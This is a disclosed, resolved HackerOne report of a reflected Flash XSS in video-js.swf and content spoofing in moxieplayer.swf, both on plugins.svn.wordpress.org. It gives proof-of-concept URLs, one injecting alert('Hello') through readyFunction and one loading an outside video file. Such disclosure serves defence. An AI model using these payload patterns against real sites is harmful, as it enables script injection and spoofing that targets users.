Reflected Swf XSS In ( plugins.svn.wordpress.org )

Disclosed: 2018-09-27 17:16:27 By m7mdharoun To wordpress
Medium
Vulnerability Details
Hello , I have found XSS in flash File ( video-js.swf ) in plugins.svn.wordpress.org and Content Spoofing Vulnerability in moxieplayer.swf ** POC ** https://plugins.svn.wordpress.org/1player/tags/1.3/players/video-js/video-js.swf?readyFunction=alert(%27Hello%27) {F222664} https://plugins.svn.wordpress.org/agile-video-player/trunk/js/plugins/media/moxieplayer.swf?url=hekimuso1973.xsl.pt/723.flv
Actions
View on HackerOne
Report Stats
  • Report ID: 270060
  • State: Closed
  • Substate: resolved
  • Upvotes: 21
Share this report